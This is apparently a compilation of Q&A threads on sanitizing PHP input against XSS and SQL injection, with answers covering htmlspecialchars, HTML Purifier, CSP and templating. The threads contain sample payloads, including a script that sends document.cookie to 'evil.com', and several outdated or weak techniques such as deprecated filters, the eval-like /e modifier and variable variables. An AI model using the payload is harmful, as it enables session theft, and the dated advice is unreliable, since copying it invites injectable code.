What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think I would prefer a combination of filter_var and urldecode if you want a simple, pure PHP solution.
Reason
Imagine an input like this:
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If I use strip_tags:
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
If I use htmlspecialchars:
var_dump(htmlspecialchars($maliciousCode));
Output
string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)
My Choice
function cleanData($str) {
$str = urldecode ($str );
$str = filter_var($str, FILTER_SANITIZE_STRING);
$str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
return $str ;
}
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)
If the form uses GET instead of POST, some input can still slip through if it is URL-encoded, which is why the function calls urldecode first. This way you keep a minimal amount of the information and make sure the final text is harmless.
There are also plenty of classes online that can help you filter input; see:
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
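For the textarea case from the question, a minimal sketch of output-time escaping might look like the following. The helper name textarea_value is hypothetical, and the sketch assumes the value was stored unmodified and is encoded only when it is written into the page.

```php
<?php
// Hypothetical helper: escape a stored value for use inside a <textarea>.
function textarea_value(string $raw): string
{
    // ENT_QUOTES also encodes single quotes; the charset is stated explicitly.
    return htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
}

// The attack string from the question, as it might come back from the database.
$stored = "</textarea><script type='text/javascript'> Malicious Code</script><textarea>";

// The browser shows the original text in the textarea but never parses it as markup.
echo '<textarea name="comment">' . textarea_value($stored) . '</textarea>', "\n";
```

Because the browser decodes the entities when it displays the textarea, the user still sees and edits exactly what they typed.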
After getting a dirty spammer on my contact form, I expanded my function that sanitizes textbox user input. It now also covers multi-line textarea input.
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{
    if ($text == "") {
        return "";
    }
    $text = nl2br($text, false); // false gives <br>, true gives <br />
    $textary = explode("<br>", $text);
    foreach ($textary as $key => $val) {
        $val = trim($val);
        $val = stripslashes($val);
        $val = htmlspecialchars($val);
        $textary[$key] = $val;
    }
    if ($html) {
        return implode("<br />", $textary); // or implode("<br>", $textary)
    } else {
        return implode("\r\n", $textary);
    }
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php
The standard way of sanitizing input would be to use commands such as
$url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%#$\|*\'()\\x80-\\xff]|i', '', $url);
$strip = array('%0d', '%0a', '%0D', '%0A');
preg_replace("/[^A-Za-z0-9 ]/", '', $string);
echo htmlentities($str);
However, I like it when my users are able to use nice things like parentheses, carets, quotes, etc. in their inputs, comments, usernames and so on. Since HTML renders codes such as &#40; into symbols such as (, I was hoping to use this alternative approach to sanitizing their input.
Before I embarked on writing a function to do this for possibly harmful characters such as ( or ; or < (so injections such as sneaky eval() or <text/javascript> would not work) I tried searching up previous people's attempts at doing this type of sanitization.
I found none.
This makes me think that I must be clearly overlooking some incredibly obvious security flaw in my "creative" sanitization method.
I will not be using this function as the primary way to protect my mySQL database. I have the new mysqli class for that. Adding this sanitization overtop of the mysqli separation of input & query seems like a nice idea, though.
I am using a completely different function to clean up URLs. Those require a different approach.
This function will be used for user input to be displayed on the page, though.
So .... what could I possibly be missing? I KNOW there's gotta be something wrong with this idea since no one else uses it, right?! Is it possible to "re-render the rendered text" or something else horrific and obvious? My pretty little function so far:
Takes input strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
function santitize_data($data) {
//explode the string
//do a replacement for each character separately. Only do one replacement.
//dont do it with preg_replace because that function searches through a string in multiple passes
//and replaces already-replaced characters, resulting in horrific mishmash.
//put it back together with + signs iterating through array variables
$patterns = array();
$patterns[0] = "'";
$patterns[1] = '"';
$patterns[2] = '!';
$patterns[3] = '\\';
$patterns[4] = '#';
$patterns[5] = '%';
$patterns[6] = '&';
$patterns[7] = '$';
$patterns[8] = '(';
$patterns[9] = ')';
$patterns[10] = '/';
$patterns[11] = ':';
$patterns[12] = ';';
$patterns[13] = '|';
$patterns[14] = '<';
$patterns[15] = '>';
$patterns[16] = '{';
$patterns[17] = '}';
$replacements = array();
$replacements[0] = '&#39;';
$replacements[1] = '&#34;';
$replacements[2] = '&#33;';
$replacements[3] = '&#92;';
$replacements[4] = '&#35;';
$replacements[5] = '&#37;';
$replacements[6] = '&#38;';
$replacements[7] = '&#36;';
$replacements[8] = '&#40;';
$replacements[9] = '&#41;';
$replacements[10] = '&#47;';
$replacements[11] = '&#58;';
$replacements[12] = '&#59;';
$replacements[13] = '&#124;';
$replacements[14] = '&#60;';
$replacements[15] = '&#62;';
$replacements[16] = '&#123;';
$replacements[17] = '&#125;';
$split_data = str_split($data);
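foreach ($split_data as &$value) {
    // count($patterns) covers all 18 entries; the old bound of 17 skipped '}'
    for ($i = 0; $i < count($patterns); $i++) {
        //testing
        //echo '<br> i='.$i.' value='.$value.' patterns[i]='.$patterns[$i].' replacements[i]='.$replacements[$i].'<br>';
        if ($value == $patterns[$i]) {
            $value = $replacements[$i];
            break; // only one replacement per character
        }
    }
}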
unset($value); // break the reference with the last element
$data = implode($split_data);
//a bit of commented out code .. was using what seemed more logical before ... preg_replace .. but it parses the string in multiple passes ):
//$data = preg_replace($patterns, $replacements, $data);
return $data;
} //---END function definition of santitize_data
Spits out result strings like meep&#39;&#59;&#41; drop table or
alert&#40;eval&#40;&#39;document.body.inne&#39; + &#39;rHTML&#39;&#41;&#41;&#59;
and the user sees these things rendered in the browser like meep';) drop table and
alert(eval('document.body.inne' + 'rHTML'));
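The single-pass requirement described in the comments above can also be met with strtr(), which does not rescan text it has already replaced when given an array. The following is only a sketch: the function name encode_chars and the shortened character map are assumptions for illustration, not the asker's code.

```php
<?php
// Hypothetical single-pass variant using strtr() with a replacement map.
function encode_chars(string $data): string
{
    $map = [
        "'" => '&#39;', '"' => '&#34;', '&' => '&#38;',
        '<' => '&#60;', '>' => '&#62;', '(' => '&#40;',
        ')' => '&#41;', ';' => '&#59;',
    ];
    // strtr() never rescans text it has already replaced,
    // so the "&" and ";" inside an emitted entity are left alone.
    return strtr($data, $map);
}

echo encode_chars("meep';) drop table"), "\n";
// prints: meep&#39;&#59;&#41; drop table
```

This avoids the double-encoding problem seen with sequential replacement, though it is still an encode-everything approach rather than context-aware escaping.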
Without analyzing your code I can tell you that there is a high probability that you've overlooked something that an attacker could use to inject their own code.
The main threat here is XSS - you shouldn't need to "sanitize" to insert data into a database. You either use parameterised queries or you correctly encode characters that the database query language confers special meaning to at the point of entry into your database (e.g. ' character). XSS is normally dealt with by encoding at the point of output, however if you want to allow rich text then you need to take a different approach which is what I believe you are looking to achieve here.
Remember there is no magic function that sanitizes input in a generic manner - it very much depends on how and where it is used to determine whether it is safe or not in that context. (This bit added so if anyone searches and finds this answer then they are up to speed - I think you're already on top of this though.)
Complexity is the main enemy of security. If you cannot determine whether your code is safe or not it is too complicated and a sufficiently motivated attacker with enough time will find a way round your sanitization methods.
What can you do about this?
If you want to allow your users to enter rich text you could either allow BBCode to allow users to insert a limited, safe subset of HTML via your own conversion functions or you could allow HTML entry and run the content through a tried and tested solution such as HTML Purifier. Now, HTML Purifier won't be perfect and I'm sure that (another) flaw will be found in it at some point in the future.
How to guard against this?
If you implement a Content Security Policy on your site, this will prevent any successfully injected script code from executing in the browser. See here for current browser support for CSP. Don't be tempted to just use one of these methods - a good security model has layered security so if one control is circumvented, the other can catch it.
Google have now implemented CSP in Gmail to ensure any HTML email received cannot try anything sneaky to launch an XSS attack.
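As a rough illustration of the CSP layer, a policy can be sent from PHP as a response header. The helper build_csp and the particular directives chosen here are assumptions for the sketch; a real site would need a policy that matches the resources it actually loads.

```php
<?php
// Hypothetical helper: build a Content-Security-Policy header value
// from a directive => sources map.
function build_csp(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

$policy = build_csp([
    'default-src' => ["'self'"],
    'script-src'  => ["'self'"],  // same-origin scripts only; inline scripts are blocked
    'object-src'  => ["'none'"],
]);

// Headers must be sent before any output.
if (!headers_sent()) {
    header('Content-Security-Policy: ' . $policy);
}
```

With a policy like this, an injected inline script block would be refused by a CSP-aware browser even if it got past the output encoding.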
On my site I have some HTML content that a user must sometimes save in the database. What is a safe way to do this? (I don't want to endanger my database, or the users who will later see that content when it is loaded from the database.)
So what I have read is:
Use htmlentities to save data in database, and html_entity_decode to decode data from database. Is this safe enough, or should I use something else?
Provided you're using string escaping and/or prepared statements, HTML markup can't cause any damage to your database. The danger with HTML markup comes when you display it to the user, as if someone has injected unsavory HTML into the markup you're going to display then you've got an XSS attack on your hands.
If you're not escaping or using prepared statements, then pretty much any data that comes from outside can be dangerous.
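A minimal sketch of the prepared-statement approach, storing the markup untouched and encoding it only on output, could look like this. It assumes the pdo_sqlite extension is available and uses an in-memory SQLite database and a made-up posts table purely so the example is self-contained; the same pattern applies to MySQL through PDO or mysqli.

```php
<?php
// Assumption: the pdo_sqlite extension is available; an in-memory SQLite
// database stands in for the real one so the sketch is self-contained.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)');

$html = "<p>Robert'); DROP TABLE posts;--</p>";

// Store the raw markup; the placeholder keeps it out of the SQL text.
$insert = $pdo->prepare('INSERT INTO posts (body) VALUES (:body)');
$insert->execute([':body' => $html]);

// Read it back unchanged, then encode at the point of output.
$body = $pdo->query('SELECT body FROM posts WHERE id = 1')->fetchColumn();
echo htmlspecialchars($body, ENT_QUOTES, 'UTF-8'), "\n";
```

Nothing is entity-encoded on the way in, so there is no need for html_entity_decode on the way out.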
You might want to look at the PHP function mysql_real_escape_string() ... More in this post: strip_tags enough to remove HTML from string?
Here's an example ...
// scrub string ... call with sanitize($blah,1) to allow HTML
function sanitize( $val, $html=0 ) {
if (is_array($val)) {
foreach ($val as $k=>$v) $val[$k] = sanitize($v, $html);
return $val;
} else {
$val = trim( $val );
if (!$html) {
$val = strip_tags($val);
$pat = array("\r\n", "\n\r", "\n", "\r");
$val = str_replace($pat, '<br>', $val); // newlines to <br>
$pat = array('/^\s+/', '/\s{2,}/', '/\s+$/'); // last pattern anchors at end of string
$rep = array('', ' ', '');
$val = preg_replace($pat, $rep, $val); // remove multiple whitespaces
}
return mysql_real_escape_string($val); // escape stuff
}
}
I have a function which cleans user input. After the clean input is returned, it goes through json_decode($var, true). Currently, I'm getting a malformed-string error, though if I print it out and test it with http://jsonlint.com/, it passes. I've come to realize that the string after the cleansing process is 149 chars long, while before it is 85. To fix this, I also ran it through a regex to remove special characters, but I'm thinking that may undo what the previous function did. Does the "new" function undo what filter_var does? Is this the best way to clean input? Below is my code:
#index.php
$cleanInput = cleanse->cleanInput($_POST);
#cleanse.php OLD
function cleanInput($input){
foreach($input as $key => $value){
$cleanInput[$key] = filter_var($value, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH));
}
return($cleanInput); //Returns 149char long string, visually 85chars
}
#cleanse.php NEW
function cleanInput($input){
foreach($input as $key => $value){
$cleanInput[$key] = preg_replace("[^+A-Za-z0-9]", "", filter_var($value, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH)));
}
return($cleanInput); //Returns 85char long string, visually 85chars
}
#outputs
#Before
{"name":"Pete Johnson","address":"123 main street","email":"myemail#gmail.com","password":"PA$$word"}
#After
{"name":"Pete Johnson","address":"123 main street","email":"myemail#gmail.com","password":"PA$$word"}
The function call to filter_var($value, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH) creates an output like this:
{&#34;name&#34;:&#34;Pete Johnson&#34;,&#34;address&#34;:&#34;123 main street&#34;,&#34;email&#34;:&#34;myemail#gmail.com&#34;,&#34;password&#34;:&#34;PA$$word&#34;}
That is why json_decode does not work.
Like I said in the comments, your best bet is to use json_decode on the input first and then run the individual elements through HTML_Purifier and/or Zend_Validator, or write your own code to deal with individual fields. For example, email has different validation requirements than password.
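To illustrate the decode-first idea, here is a small sketch that decodes the raw JSON and then applies a separate rule to each field. The function name validate_signup, the field rules, and the example address are assumptions for illustration only. (Note also that FILTER_SANITIZE_STRING is deprecated as of PHP 8.1, which is another reason not to build on it.)

```php
<?php
// Hypothetical per-field validation after decoding the raw JSON first.
function validate_signup(string $json): array
{
    $data = json_decode($json, true);
    if (!is_array($data)) {
        return ['errors' => ['json' => 'malformed JSON']];
    }

    // Treat missing or non-string fields as empty strings.
    $str = fn($key) => is_string($data[$key] ?? null) ? $data[$key] : '';

    $errors = [];
    // Each field gets its own rule instead of one blanket filter.
    if (filter_var($str('email'), FILTER_VALIDATE_EMAIL) === false) {
        $errors['email'] = 'invalid email address';
    }
    if (strlen($str('password')) < 8) {
        $errors['password'] = 'password too short';
    }
    if (trim($str('name')) === '') {
        $errors['name'] = 'name is required';
    }

    return ['data' => $data, 'errors' => $errors];
}

$result = validate_signup('{"name":"Pete Johnson","email":"pete@example.com","password":"PA$$word"}');
print_r($result['errors']);
```

The password is validated but never altered, so characters like $ survive; HTML encoding is left for whenever a value is actually printed.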
EDIT:
I tried running your input through the new function, but I couldn't get it to work as is, so I made a few adjustments. I'm not sure this is what you intended for your regex, though. Here is what I got as output from this code:
$input = '{"name":"Pete Johnson","address":"123 main street","email":"myemail#gmail.com","password":"PA$$word"}';
$cleanedInput = preg_replace("/[^+A-Za-z0-9]/", "", filter_var($input, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH));
echo $cleanedInput;
Output:
34name3434PeteJohnson3434address3434123mainstreet3434email3434myemailgmailcom3434password3434PAword34
How do you remove ALL HTML tags with CodeIgniter? I'm guessing you would have to use the PHP function strip_tags, but I wanted something like the global setting for XSS filtering.
Thanks
If you're referring to using the input methods, then yes, you could technically open up system/libraries/Input.php and head down to this code:
/**
* Clean Input Data
*
* This is a helper function. It escapes data and
* standardizes newline characters to \n
*
* @access private
* @param string
* @return string
*/
function _clean_input_data($str)
{
if (is_array($str))
{
$new_array = array();
foreach ($str as $key => $val)
{
$new_array[$this->_clean_input_keys($key)] = $this->_clean_input_data($val);
}
return $new_array;
}
// We strip slashes if magic quotes is on to keep things consistent
if (get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
// Standardize newlines
if (strpos($str, "\r") !== FALSE)
{
$str = str_replace(array("\r\n", "\r"), "\n", $str);
}
return $str;
}
And right after the xss clean, you could put your own filtering function like so:
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
$str = strip_tags($str);
However, this means that every time you update CodeIgniter, you will have to make this change again. Also, since this applies globally, it won't make sense if the value you're getting back is, for example, numeric. For these reasons, I wouldn't recommend this approach.
Now for an alternative solution: you can use the CodeIgniter Form Validation library, which lets you set custom rules for fields, including PHP functions that accept one argument, such as strip_tags:
$this->form_validation->set_rules('usertext', 'User Text', 'required|strip_tags');
I'm not sure what the circumstances are, so I'll let you decide which path to take, but in general I recommend handling data validation on a per case basis, since in a majority of cases the validation on the data is unique.
This is what I use when I want to eliminate XSS, HTML and still preserve the user post content (even malicious code attempts)
private function stripHTMLtags($str)
{
$t = preg_replace('/<[^<|>]+?>/', '', htmlspecialchars_decode($str));
$t = htmlentities($t, ENT_QUOTES, "UTF-8");
return $t;
}
The regex removes everything that looks like an HTML tag, and htmlentities takes care of quotes and the like.
Use it in your controller every time you need to REALLY clean things up. Fast and simple.
E.g., this very malicious string with lots of code tags and stuff
Just another post (http://codeigniter.com) blablabla text blabla:</p>1 from users; update users set password = 'password'; select * <div class="codeblock">[aça]<code><span style="color: rgb(221, 0, 0);">'username'</span><span style="color: rgb(0, 119, 0);">); </span><span style="color: rgb(255, 128, 0);">// filtered<br></span><span style="color: rgb(0, 0, 187);">- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password </span></span>
<ok.>
Becomes
Just another post (http://codeigniter.com) blablabla text blabla:1 from users; update users set password = 'password'; select * [aça]'username'); // filtered- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password <ok.>
It still has the code in it, but that won't do anything to your db.
Use it like
$this->stripHTMLtags($this->input->post('html_text'));
You can put this function inside a library so you don't have to hack CI :)
For reasons I'd rather not get into right now, I have a string like so:
<div>$title</div>
that gets stored in a database using mysql_real_escape_string.
During normal script execution, that string gets parsed and stored in a variable $string and then gets sent to a function($string).
In this function, I am trying to:
function test($string){
$title = 'please print';
echo $string;
}
//I want the outcome to be <div>please print</div>
This seems like the silliest thing, but for the life of me, I cannot get it to "interpret" the variables.
I've also tried,
echo html_entity_decode($string);
echo bin2hex(html_entity_decode($string)); //Just to see what php was actually seeing I thought maybe the $ had a slash on it or something.
I decided to post on here when my mind kept drifting to using EVAL().
This is just pseudocode, of course. What is the best way to approach this?
Your example is a bit abstract. But it seems like you could do pretty much what the template engines do for this case:
function test($string){
$title = 'please print';
$vars = get_defined_vars();
$string = preg_replace('/[$](\w{3,20})/e', '$vars["$1"]', $string);
echo $string;
}
Now actually, /e is pretty much the same as using eval. But at least this only replaces actual variable names. Could be made a bit more sophisticated still.
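The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so on current versions the same idea has to be written with preg_replace_callback. The following is a sketch rather than a drop-in replacement: the function name render is made up, and it takes an explicit array of allowed values instead of get_defined_vars().

```php
<?php
// Sketch: replace $name placeholders via a callback and an explicit
// whitelist of values, rather than the /e modifier.
function render(string $template, array $vars): string
{
    return preg_replace_callback(
        '/\$(\w{3,20})/',
        function (array $m) use ($vars) {
            // Unknown names are left untouched instead of being evaluated.
            return array_key_exists($m[1], $vars) ? (string) $vars[$m[1]] : $m[0];
        },
        $template
    );
}

echo render('<div>$title</div>', ['title' => 'please print']), "\n";
// prints: <div>please print</div>
```

Nothing from the stored string is ever executed; it is only used to look up keys in the array you pass in.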
I don't think there is a way to get that to work. You are trying something like this:
$var = "cute text";
echo 'this is $var';
The single quotes are preventing the interpreter from looking for variables in the string. And it is the same, when you echo a string variable.
The solution will be a simple str_replace.
echo str_replace('$title', $title, $string);
But in this case I really suggest using template variables that are unique in your text.
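One way to read that suggestion, sketched under the assumption of a {{name}} marker syntax (the marker style and the function name fill_template are both hypothetical), is to store placeholders that cannot collide with ordinary text and fill them from an array:

```php
<?php
// Hypothetical placeholder syntax {{name}}; any marker that cannot occur
// in normal text would do.
function fill_template(string $template, array $values): string
{
    $map = [];
    foreach ($values as $name => $value) {
        $map['{{' . $name . '}}'] = $value;
    }
    // strtr() replaces all markers in a single pass.
    return strtr($template, $map);
}

echo fill_template('<div>{{title}}</div>', ['title' => 'please print']), "\n";
// prints: <div>please print</div>
```

Unlike a bare $title, a marker such as {{title}} is unlikely to appear by accident in prices or other text that contains a dollar sign.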
You just don't do that, a variable is a living thing, it's against its nature to store it like that, flat and dead in a string in the database.
If you want to replace some parts of a string with the content of a variable, use sprintf().
Example
$stringFromTheDb = '<div>%s is not %s</div>';
Then use it with:
$finalString = sprintf($stringFromTheDb, 'this', 'that');
echo $finalString;
will result in:
<div>this is not that</div>
If you know that the variable inside the div is $title, you can str_replace it.
function test($string){
$title = 'please print';
echo str_replace('$title', $title, $string);
}
If you don't know the variables in the string, you can use a regex to get them (I used the regex from the PHP manual).
function test($string){
$title = 'please print';
$vars = '/(?<=\$)[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/';
preg_match_all($vars, $string, $replace);
foreach($replace[0] as $r){
$string = str_replace('$'.$r, $$r, $string);
}
echo $string;
}